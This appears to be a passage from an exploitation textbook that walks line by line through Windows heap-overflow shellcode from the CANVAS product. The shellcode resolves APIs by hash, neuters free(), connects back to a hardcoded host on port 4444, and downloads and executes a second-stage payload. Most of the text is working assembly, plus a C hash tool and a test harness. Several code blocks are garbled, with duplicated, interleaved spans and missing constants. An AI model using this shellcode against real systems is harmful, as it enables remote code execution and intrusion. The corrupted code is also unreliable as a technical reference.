| ||
The code in the following example is taken from Windows shellcode originally used for the CANVAS product. Before we do a line-by-line analysis, you should know some of the design decisions that went into developing the shellcode:
Reliability was a key issue. It had to work every time, with no outside dependencies.
Extendibility was important. Understandable shellcode makes a big difference when you want to customize it in some way you didn't foresee.
Size is always important with shellcodethe smaller the better. Compressing shellcode takes time, however, and may obfuscate the shellcode and make it unmanageable. For this reason, the shellcode shown below is quite large. We overcome the problem with the Structured Exception Handler (SEH) hunting shellcode, as you'll see later. If you want to spend time learning x86 and squeezing down this shellcode, by all means, feel free.
Note that because this is a simple C file that gcc can parse, it can be written and compiled equally as well on any x86 platform that gcc supports. Let's take a line-by-line look at the shellcode, heapoverflow.c , and see how it works.
Our first step is to include windows.h , so that if we want to write Win32-specific code for testing purposesusually to get the value of some Win32 constant or structurewe can.
//released under the GNU PUBLIC LICENSE v2.0 #include <stdio.h> #include <malloc.h> #ifdef Win32 #include <windows.h> #endif
We start the shellcode function, which is just a thin wrapper around gcc asm() statements with several .set statements. These statements don't produce any code or take up any space; they exist to give us an easily manageable place in which to store constants that we'll use inside the shellcode.
void getprocaddr() { /*GLOBAL DEFINES*/ asm(" .set KERNEL32HASH, 0x000d4e88 .set NUMBEROFKERNEL32FUNCTIONS,0x4 .set VIRTUALPROTECTHASH, 0x38d13c .set GETPROCADDRESSHASH,0x00348bfa .set LOADLIBRARYAHASH, 0x000d5786 .set GETSYSTEMDIRECTORYAHASH, 0x069bb2e6 .set WS232HASH, 0x0003ab08 .set NUMBEROFWS232FUNCTIONS,0x5 .set CONNECTHASH, 0x0000677c .set RECVHASH, 0x00000cc0 .set SENDHASH, 0x00000cd8 .set WSASTARTUPHASH, 0x00039314 .set SOCKETHASH, 0x000036a4 .set MSVCRTHASH, 0x00037908 .set NUMBEROFMSVCRTFUNCTIONS, 0x01 .set FREEHASH, 0x00000c4e .set ADVAPI32HASH, 0x000ca608 .set NUMBEROFADVAPI32FUNCTIONS, 0x01 .set REVERTTOSELFHASH, 0x000dcdb4 ");
Now, we start our shellcode. We are writing Position Independent Code (PIC), and the first thing we do is set %ebx to our current location. Then, all local variables are referenced from %ebx . This is much like how a real compiler would do it.
/*START OF SHELLCODE*/ asm(" mainentrypoint: call geteip geteip: pop %ebx
Because we don't know where esp is pointing, we now have to normalize it to avoid stepping on ourselves whenever we do a call. This can actually be a problem even in the getPC code, so for exploits where %esp is pointing at you, you may want to include a sub $50,%esp before the shellcode. If you make the size of your scratch space too large ( 0x1000 is what I use here), then you'll step off the end of the memory segment and cause an access violation trying to write to the stack. We chose a reasonable size here, which works reliably in most every situation.
movl %ebx,%esp sublmovl %ebx,%esp subl $0x1000,%espx1000,%esp
Weirdly enough, %esp must be aligned in order for some Win32 functions in ws2_32.dll to work (this actually may be a bug in ws2_32.dll ). We do that here:
andand $0xffffff00,%espxffffff00,%esp
We can finally start filling our function table. The first thing we do is get the address of the functions we need in kernel32.dll . We've split this into three calls to our internal function that will fill out our table for us. We set ecx to the number of functions in our hash list and enter a loop. Each time we go through the loop, we pass getfuncaddress() , the hash of kernel32.dll (don't forget the .dll ), and the hash of the function name we're looking for. When the program returns the address of the function, we then put that into our table, which is pointed to by %edi . One thing to notice is that the method for addressing throughout the code is uniform. LABEL-geteip(%ebx) always points to the LABEL , so you can use that to easily access stored variables.
//set up the loop movl $NUMBEROFKERNEL32FUNCTIONS,%ecx lea KERNEL32HASHESTABLE-geteip(%ebx),%esi lea KERNEL32FUNCTIONSTABLE-geteip(%ebx),%edi //run the loop getkernel32functions: //push the hash we are looking for, which is pointed to by %esi pushl (%esi) pushl $KERNEL32HASH call getfuncaddress movl %eax,(%edi) addl , %edi addl , %esi loop getkernel32functions
Now that we have our table filled with .dllkernel32.dll 's functions, we can get the functions we need from MSVCRT . You'll notice the same loop structure here. We'll delve into how the getfuncaddress() function works when we reach it. For now, just assume it works.
//GET MSVCRT FUNCTIONS movl $NUMBEROFMSVCRTFUNCTIONS,%ecx lea MSVCRTHASHESTABLE-geteip(%ebx),%esi lea MSVCRTFUNCTIONSTABLE-geteip(%ebx),%edi getmsvcrtfunctions: pushl (%esi) pushl $MSVCRTHASH call getfuncaddress movl %eax,(%edi) addl , %edi addl , %esi loop getmsvcrtfunctions
With heap overflows, you corrupt a heap in order to gain control. But if you are not the only thread operating on the heap, you may have problems as other threads attempt to free() memory they allocated on that heap. To prevent this, we modify the function free() so that it just returns. Opcode 0xc3 is returned, which we use to replace the function prelude.
To do what is described in the previous paragraph, we need to change the protection mode on the page in which the function free() appears. Like most pages that have executable code in them, the page containing free() is marked as read and execute onlywe must set the page to +rwx . VirtualProtect is in MSVCRT , so we should already have it in our function pointer table. We temporarily store a pointer to free() in our internal data structures (we never bother to reset the permissions on the page).
//QUICKLY! //VIRTUALPROTECT FREE +rwx lea BUF-geteip(%ebx),%eax pushl %eax pushl//QUICKLY! //VIRTUALPROTECT FREE +rwx lea BUF-geteip(%ebx),%eax pushl %eax pushl $0x40 pushl $50 movl FREE-geteip(%ebx),%edx pushl %edx call *VIRTUALPROTECT-geteip(%ebx) //restore edx as FREE movl FREE-geteip(%ebx),%edx //overwrite it with return! movl $0xc3c3c3c3,(%edx) //we leave it +rwxx40 pushl movl FREE-geteip(%ebx),%edx pushl %edx call *VIRTUALPROTECT-geteip(%ebx) //restore edx as FREE movl FREE-geteip(%ebx),%edx //overwrite it with return! movl//QUICKLY! //VIRTUALPROTECT FREE +rwx lea BUF-geteip(%ebx),%eax pushl %eax pushl $0x40 pushl $50 movl FREE-geteip(%ebx),%edx pushl %edx call *VIRTUALPROTECT-geteip(%ebx) //restore edx as FREE movl FREE-geteip(%ebx),%edx //overwrite it with return! movl $0xc3c3c3c3,(%edx) //we leave it +rwxxc3c3c3c3,(%edx) //we leave it +rwx
Now, free() no longer accesses the heap at all, it just returns. This prevents any other threads from causing access violations while we control the program.
At the end of our shellcode is the string ws2_32.dll . We want to load it (in case it is not already loaded), initialize it, and use it to make a connection to our host, which will be listening on a TCP port. Unfortunately we have several problems ahead of us. In some exploits, for example the RPC LOCATOR exploit, you cannot load ws2_32.dll unless you call RevertToSelf() first. This is because the "anonymous" user does not have permissions to read any files, and the locator thread you are in has temporally impersonated the anonymous user to handle your request. So we have to assume ADVAPI.dll is loaded and use it to find RevertToSelf . It is a rare Windows program that doesn't have ADVAPI.dll loaded, but if it is not loaded, this part of the shellcode will crash. You could add a check to see if the function pointer for RevertToSelf is zero and call it only if it is not. This check wasn't done here, because we've never needed it, and only adds a few more bytes to the size of the shellcode.
//Now, we call the RevertToSelf() function so we can actually do some//thing on the machine //You can't read ws2_32.dll in the locator exploit without this. movl $NUMBEROFADVAPI32FUNCTIONS,%ecx lea ADVAPI32HASHESTABLE-geteip(%ebx),%esi lea ADVAPI32FUNCTIONSTABLE-geteip(%ebx),%edi getadvapi32functions: pushl (%esi) pushl $ADVAPI32HASH call getfuncaddress movl %eax,(%edi) addl ,%esi addl ,%edi loop getadvapi32functions call *REVERTTOSELF-geteip(%ebx)
Now that we're running as the original process's user, we have permission to read ws2_32.dll . But on some Windows systems, because of the dot (.) in the path , LoadLibraryA() will fail to find ws2_32.dll unless the entire path is specified. This means we now have to call GetSystemDirectoryA() and prepend that to the string ws2_32.dll . We do this in a temporary buffer ( BUF ) at the end of our shellcode.
//call getsystemdirectoryA, then prepend to ws2_32.dll pushl 48 lea BUF-geteip(%ebx),%eax pushl %eax call *GETSYSTEMDIRECTORYA-geteip(%ebx) //ok, now buf is loaded with the current working system directory //we now need to append \WS2_32.dll to that, because //of a bug in LoadLibraryA, which won't find WS2_32.dll if there is a //dot in that path lea BUF-geteip(%ebx),%eax findendofsystemroot: cmpb//call getsystemdirectoryA, then prepend to ws2_32.dll pushl $2048 lea BUF-geteip(%ebx),%eax pushl %eax call *GETSYSTEMDIRECTORYA-geteip(%ebx) //ok, now buf is loaded with the current working system directory //we now need to append \\WS2_32.dll to that, because //of a bug in LoadLibraryA, which won't find WS2_32.dll if there is a //dot in that path lea BUF-geteip(%ebx),%eax findendofsystemroot: cmpb $0,(%eax) je foundendofsystemroot inc %eax jmp findendofsystemroot foundendofsystemroot: //eax is now pointing to the final null of C:\\windows\\system32 lea WS2_32DLL-geteip(%ebx),%esi strcpyintobuf: movb (%esi), %dl movb %dl,(%eax) test %dl,%dl jz donewithstrcpy inc %esi inc %eax jmp strcpyintobuf donewithstrcpy: //loadlibrarya(\"c:\\winnt\\system32\\ws2_32.dll\"); lea BUF-geteip(%ebx),%edx pushl %edx call *LOADLIBRARY-geteip(%ebx),(%eax) je foundendofsystemroot inc %eax jmp findendofsystemroot foundendofsystemroot: //eax is now pointing to the final null of C:\windows\system32 lea WS2_32DLL-geteip(%ebx),%esi strcpyintobuf: movb (%esi), %dl movb %dl,(%eax) test %dl,%dl jz donewithstrcpy inc %esi inc %eax jmp strcpyintobuf donewithstrcpy: //loadlibrarya(\"c:\winnt\system32\ws2_32.dll\"); lea BUF-geteip(%ebx),%edx pushl %edx call *LOADLIBRARY-geteip(%ebx)
Now that we know for certain that ws2_32.dll has loaded, we can load the functions from it that we will need for connectivity.
movl $NUMBEROFWS232FUNCTIONS,%ecx lea WS232HASHESTABLE-geteip(%ebx),%esi lea WS232FUNCTIONSTABLE-geteip(%ebx),%edi getws232functions: //get getprocaddress //hash of getprocaddress pushl (%esi) //push hash of KERNEL32.dll pushl $WS232HASH call getfuncaddress movl %eax,(%edi) addl , %esi addl , %edi loop getws232functions //ok, now we set up BUFADDR on a quadword boundary //esp will do since it points far above our current position movl %esp,BUFADDR-geteip(%ebx) //done setting up BUFADDR
Of course, you must call WSASTARTUP to get ws 2_32.dll rolling. If ws2_32.dll has already been initialized , then calling WSASTARTUP won't do anything hazardous.
movl BUFADDR-geteip(%ebx), %eax pushl %eax pushlmovl BUFADDR-geteip(%ebx), %eax pushl %eax pushl $0x101 call *WSASTARTUP-geteip(%ebx) //call socket pushl $6 pushl $1 pushl $2 call *SOCKET-geteip(%ebx) movl %eax,FDSPOT-geteip(%ebx)x101 call *WSASTARTUP-geteip(%ebx) //call socket pushl pushl pushl call *SOCKET-geteip(%ebx) movl %eax,FDSPOT-geteip(%ebx)
Now, we call connect(), which uses the address we have hardcoded into the bottom of the shellcode. For real-world use, you'd do a search and replace on the following piece of the shellcode, changing the address to another IP and port as needed. If the connect() fails, we jump to exitthread which will simply cause an exception and crash. Sometimes you'll want to call ExitProcess() and sometimes you'll want to cause an exception for the process to handle.
//call connect //push addrlen=16 push//call connect //push addrlen=16 push $0x10 lea SockAddrSPOT-geteip(%ebx),%esi //the 4444 is our port pushl %esi //push fd pushl %eax call *CONNECT-geteip(%ebx) test %eax,%eax jl exitthreadx10 lea SockAddrSPOT-geteip(%ebx),%esi //the 4444 is our port pushl %esi //push fd pushl %eax call *CONNECT-geteip(%ebx) test %eax,%eax jl exitthread
Next , we read in the size of the second-stage shellcode from the remote server.
pushl call recvloop //ok, now the size is the first word in BUF //Now that we have the size, we read in that much shellcode into the //buffer. movl BUFADDR-geteip(%ebx),%edx movl (%edx),%edx //now edx has the size push %edx //read the data into BUF call recvloop //Now we just execute it. movl BUFADDR-geteip(%ebx),%edx call *%edx
At this point, we've given control over to our second-stage shellcode. In most cases, the second-stage shellcode will go through much of the previous processes again.
Next, let's look at some of the utility functions we've used throughout our shellcode. The following code shows the recvloop function, which takes in the size and uses some of our "global" variables to control into where it reads data. Like the connect() function, recvloop jumps to the exitthread code if it finds an error.
//recvloop function asm(" //START FUNCTION RECVLOOP //arguments: size to be read //reads into *BUFADDR recvloop: pushl %ebp movl %esp,%ebp push %edx push %edi //get arg1 into edx movl 0x8(%ebp), %edx movl BUFADDR-geteip(%ebx),%edi callrecvloop: //not an argument- but recv() messes up edx! So we save it off here pushl %edx //flags pushl//recvloop function asm(" //START FUNCTION RECVLOOP //arguments: size to be read //reads into *BUFADDR recvloop: pushl %ebp movl %esp,%ebp push %edx push %edi //get arg1 into edx movl 0x8(%ebp), %edx movl BUFADDR-geteip(%ebx),%edi callrecvloop: //not an argument- but recv() messes up edx! So we save it off here pushl %edx //flags pushl $0 //len pushl $1 //*buf pushl %edi movl FDSPOT-geteip(%ebx),%eax pushl %eax call *RECV-geteip(%ebx) //prevents getting stuck in an endless loop if the server closes the connection cmp $0xffffffff,%eax je exitthread popl %edx //subtract how many we read sub %eax,%edx //move buffer pointer forward add %eax,%edi //test if we need to exit the function //recv returned 0 test %eax,%eax je donewithrecvloop //we read all the data we wanted to read test %edx,%edx je donewithrecvloop jmp callrecvloop donewithrecvloop: //done with recvloop pop %edi pop %edx mov %ebp, %esp pop %ebp ret $0x04 //END FUNCTION//len pushl //*buf pushl %edi movl FDSPOT-geteip(%ebx),%eax pushl %eax call *RECV-geteip(%ebx) //prevents getting stuck in an endless loop if the server closes the connection cmp//recvloop function asm(" //START FUNCTION RECVLOOP //arguments: size to be read //reads into *BUFADDR recvloop: pushl %ebp movl %esp,%ebp push %edx push %edi //get arg1 into edx movl 0x8(%ebp), %edx movl BUFADDR-geteip(%ebx),%edi callrecvloop: //not an argument- but recv() messes up edx! So we save it off here pushl %edx //flags pushl $0 //len pushl $1 //*buf pushl %edi movl FDSPOT-geteip(%ebx),%eax pushl %eax call *RECV-geteip(%ebx) //prevents getting stuck in an endless loop if the server closes the connection cmp $0xffffffff,%eax je exitthread popl %edx //subtract how many we read sub %eax,%edx //move buffer pointer forward add %eax,%edi //test if we need to exit the function //recv returned 0 test %eax,%eax je donewithrecvloop //we read all the data we wanted to read test %edx,%edx je donewithrecvloop jmp callrecvloop donewithrecvloop: //done with recvloop pop %edi pop %edx mov %ebp, %esp pop %ebp ret $0x04 //END FUNCTIONxffffffff,%eax je exitthread popl %edx //subtract how many we read sub %eax,%edx //move buffer pointer forward add %eax,%edi //test if we need to exit the function //recv returned 0 test %eax,%eax je donewithrecvloop //we read all the data we wanted to read test %edx,%edx je donewithrecvloop jmp callrecvloop donewithrecvloop: //done with recvloop pop %edi pop %edx mov %ebp, %esp pop %ebp ret//recvloop function asm(" //START FUNCTION RECVLOOP //arguments: size to be read //reads into *BUFADDR recvloop: pushl %ebp movl %esp,%ebp push %edx push %edi //get arg1 into edx movl 0x8(%ebp), %edx movl BUFADDR-geteip(%ebx),%edi callrecvloop: //not an argument- but recv() messes up edx! So we save it off here pushl %edx //flags pushl $0 //len pushl $1 //*buf pushl %edi movl FDSPOT-geteip(%ebx),%eax pushl %eax call *RECV-geteip(%ebx) //prevents getting stuck in an endless loop if the server closes the connection cmp $0xffffffff,%eax je exitthread popl %edx //subtract how many we read sub %eax,%edx //move buffer pointer forward add %eax,%edi //test if we need to exit the function //recv returned 0 test %eax,%eax je donewithrecvloop //we read all the data we wanted to read test %edx,%edx je donewithrecvloop jmp callrecvloop donewithrecvloop: //done with recvloop pop %edi pop %edx mov %ebp, %esp pop %ebp ret $0x04 //END FUNCTIONx04 //END FUNCTION
The next function gets a function pointer address from a hash of the DLL and the function name. It is probably the most confusing function in the entire shellcode since it does the most work and is fairly unconventional. It relies on the fact that when a Windows program is running, fs:[0x30] is a pointer to the Process Environment Block (PEB), and from that you can find all the modules that are loaded into memory. We walk each module looking for one that has the name kernel32.dll.dll by doing a hash compare. Our hash function has a simple flag that allows it to hash Unicode or straight ASCII strings.
Be aware that many published methods are available to run this processsome more compact that others. Halvar Flake's code, for example, uses 16-bit hash values to conserve space; there are many ways to parse a PE header to get the pointers we're looking for. Additionally, you don't have to parse the PE header to get every functionyou could parse it to get GetProcAddress() and use that to get everything else.
/* fs[0x30] is pointer to PEB *that + 0c is _PEB_LDR_DATA pointer *that + 0c is in load order module list pointer
For further reference, see:
www.builder.cz/art/asembler/anti_procdump.html
www.onebull.org/document/doc/win2kmodules.htm
Generally, you will follow these steps:
Get the PE Header from the current module ( fs:0x30 ).
Go to the PE header.
Go to the export table and obtain the value of nBase .
Get arrayOfNames and find the function.
*/ //void* GETFUNCADDRESS( int hash1,int hash2) /*START OF CODE THAT GETS THE ADDRESSES*/ //arguments //hash of dll //hash of function //returns function address getfuncaddress: pushl %ebp movl %esp,%ebp pushl %ebx pushl %esi pushl %edi pushl %ecx pushl %fs:(0x30) popl %eax //test %eax,%eax //JS WIN9X NT: //get _PEB_LDR_DATA ptr movl 0xc(%eax),%eax //get first module pointer list movl 0xc(%eax),%ecx nextinlist: //next in the list into %edx movl (%ecx),%edx //this is the unicode name of our module movl 0x30(%ecx),%eax //compare the unicode string at %eax to our string //if it matches KERNEL32.dll, then we have our module address at 0x18+%ecx //call hash match //push unicode increment value pushl //push hash movl 8(%ebp),%edi pushl %edi //push string address pushl %eax call hashit test %eax,%eax jz foundmodule //otherwise check the next node in the list movl %edx,%ecx jmp nextinlist //FOUND THE MODULE, GET THE PROCEDURE foundmodule: //we are pointing to the winning list entry with ecx //get the base address movl 0x18(%ecx),%eax //we want to save this off since this is our base that we will have to add push %eax //ok, we are now pointing at the start of the module (the MZ for //the dos header IMAGE_DOS_HEADER.e_lfanew is what we want //to go parse (the PE header itself) movl 0x3c(%eax),%ebx addl %ebx,%eax //%ebx is now pointing to the PE header (ascii PE) //PE->export table is what we want //0x150-0xd8=0x78 according to OllyDbg movl 0x78(%eax),%ebx //eax is now the base again! pop %eax push %eax addl %eax,%ebx //this eax is now the Export Directory Table //From MS PE-COFF table, 6.3.1 (search for pecoff at MS Site to download) //Offset Size Field Description //16 4 Ordinal Base (usually set to one!) //24 4 Number of Name pointers (also the number of ordinals) //28 4 Export Address Table RVA Address EAT relative to base //32 4 Name Pointer Table RVA Addresses (RVA's) of Names! //36 4 Ordinal Table RVA You need the ordinals to get the addresses //theoretically we need to subtract the ordinal base, but it turns //out they don't actually use it //movl 16(%ebx),%edi //edi is now the ordinal base! movl 28(%ebx),%ecx //ecx is now the address table movl 32(%ebx),%edx //edx is the name pointer table movl 36(%ebx),%ebx //ebx is the ordinal table //eax is now the base address again //correct those RVA's into actual addresses addl %eax,%ecx addl %eax,%edx addl %eax,%ebx ////HERE IS WHERE WE FIND THE FUNCTION POINTER ITSELF find_procedure: //for each pointer in the name pointer table, match against our hash //if the hash matches, then we go into the address table and get the //address using the ordinal table movl (%edx),%esi pop %eax pushl %eax addl %eax,%esi //push the hash increment - we are ascii pushl //push the function hash pushl 12(%ebp) //esi has the address of our actual string pushl %esi call hashit test %eax, %eax jz found_procedure //increment our pointer into the name table add ,%edx //increment out pointer into the ordinal table //ordinals are only 16 bits add ,%ebx jmp find_procedure found_procedure: //set eax to the base address again pop %eax xor %edx,%edx //get the ordinal into dx //ordinal=ExportOrdinalTable[i] (pointed to by ebx) mov (%ebx),%dx //SymbolRVA = ExportAddressTable[ordinal-OrdinalBase] //see note above for lack of ordinal base use //subtract ordinal base //sub %edi,%edx //multiply that by sizeof(dword) shl ,%edx //add that to the export address table (dereference in above .c statement) //to get the RVA of the actual address add %edx,%ecx //now add that to the base and we get our actual address add (%ecx),%eax //done eax has the address! popl %ecx popl %edi popl %esi popl %ebx mov %ebp,%esp pop %ebp ret
The following is our hash function. It hashes a string simply, ignoring case.
//hashit function //takes 3 args //increment for unicode/ascii //hash to test against //address of string hashit: pushl %ebp movl %esp,%ebp push %ecx push %ebx push %edx xor %ecx,%ecx xor %ebx,%ebx xor %edx,%edx mov 8(%ebp),%eax hashloop: movb (%eax),%dl //convert char to upper case or//hashit function //takes 3 args //increment for unicode/ascii //hash to test against //address of string hashit: pushl %ebp movl %esp,%ebp push %ecx push %ebx push %edx xor %ecx,%ecx xor %ebx,%ebx xor %edx,%edx mov 8(%ebp),%eax hashloop: movb (%eax),%dl //convert char to upper case or $0x60,%dl add %edx,%ebx shl $1,%ebx //add increment to the pointer //2 for unicode, 1 for ascii addl 16(%ebp),%eax mov (%eax),%cl test %cl,%cl loopnz hashloop xor %eax,%eax mov 12(%ebp),%ecx cmp %ecx,%ebx jz donehash //failed to match, set eax==1 inc %eax donehash: pop %edx pop %ebx pop %ecx mov %ebp,%esp pop %ebp ret $12x60,%dl add %edx,%ebx shl ,%ebx //add increment to the pointer //2 for unicode, 1 for ascii addl 16(%ebp),%eax mov (%eax),%cl test %cl,%cl loopnz hashloop xor %eax,%eax mov 12(%ebp),%ecx cmp %ecx,%ebx jz donehash //failed to match, set eax==1 inc %eax donehash: pop %edx pop %ebx pop %ecx mov %ebp,%esp pop %ebp ret
Here is a hashing program in C, used in generating the hashes that the above shellcode can use. Every shellcode that uses this method will use a different hash function. Almost any hash function will work; we chose one here that was small and easy to write in assembly language.
#include <stdio.h> main(int argc, char **argv) { char * p; unsigned int hash; if (argc<2) { printf("Usage: hash.exe kernel32.dll\n"); exit(0); } p=argv[1]; hash=0; while (*p!=0) { //toupper the character hash=hash + (*(unsigned char * )p 0x60); p++; hash=hash << 1; } printf("Hash: 0x%8.8x\n",hash); }
If we need to call ExitThread() or ExitProcess() , then we replace the following crash function with some other function. However, it usually suffices to use the following instructions:
exitthread: //just cause an exception xor %eax,%eax call *%eax
Now, we begin our data. To use this code, you replace the stored sockaddr with another structure you've computed that will go to the correct host and port.
SockAddrSPOT: //first 2 bytes are the PORT (then AF_INET is 0002) .long 0x44440002 //server ip 651a8c0 is 192.168.1.101 .long 0x6501a8c0 KERNEL32HASHESTABLE: .long GETSYSTEMDIRECTORYAHASH .long VIRTUALPROTECTHASH .long GETPROCADDRESSHASH .long LOADLIBRARYAHASH MSVCRTHASHESTABLE: .long FREEHASH ADVAPI32HASHESTABLE: .long REVERTTOSELFHASH WS232HASHESTABLE: .long CONNECTHASH .long RECVHASH .long SENDHASH .long WSASTARTUPHASH .long SOCKETHASH WS2_32DLL: .ascii \"ws2_32.dll\" .long 0x00000000 endsploit: //nothing below this line is actually included in the shellcode, but it //is used for scratch space when the exploit is running. MSVCRTFUNCTIONSTABLE: FREE: .long 0x00000000 KERNEL32FUNCTIONSTABLE: VIRTUALPROTECT: .long 0x00000000 GETPROCADDRA: .long 0x00000000 LOADLIBRARY: .long 0x00000000 //end of kernel32.dll functions table //this stores the address of buf+8 mod 8, since we //are not guaranteed to be on a word boundary, and we //want to be so Win32 api works BUFADDR: .long 0x00000000 WS232FUNCTIONSTABLE: CONNECT: .long 0x00000000 RECV: .long 0x00000000 SEND: .long 0x00000000 WSASTARTUP: .long 0x00000000 SOCKET: .long 0x00000000 //end of ws2_32.dll functions table SIZE: .long 0x00000000 FDSPOT: .long 0x00000000 BUF: .long 0x00000000 "); }
Our main routine prints out the shellcode when we need it to, or calls it for testing.
int main() { unsigned char buffer[4000]; unsigned char * p; int i; char *mbuf,*mbuf2; int error=0; //getprocaddr(); memcpy(buffer,getprocaddr,2400); p=buffer; p+=3; /*skip prelude of function*/ //#define DOPRINT #ifdef DOPRINT /*gdb ) printf "%d\n", endsploit - mainentrypoint -1 */ printf("\""); for (i=0; i<666; i++) { printf("\x%2.2x",*p); if ((i+1)%8==0) printf("\"\nshellcode+=\""); p++; } printf("\"\n"); #endif #define DOCALL #ifdef DOCALL ((void(*)())(p)) (); #endif }
| ||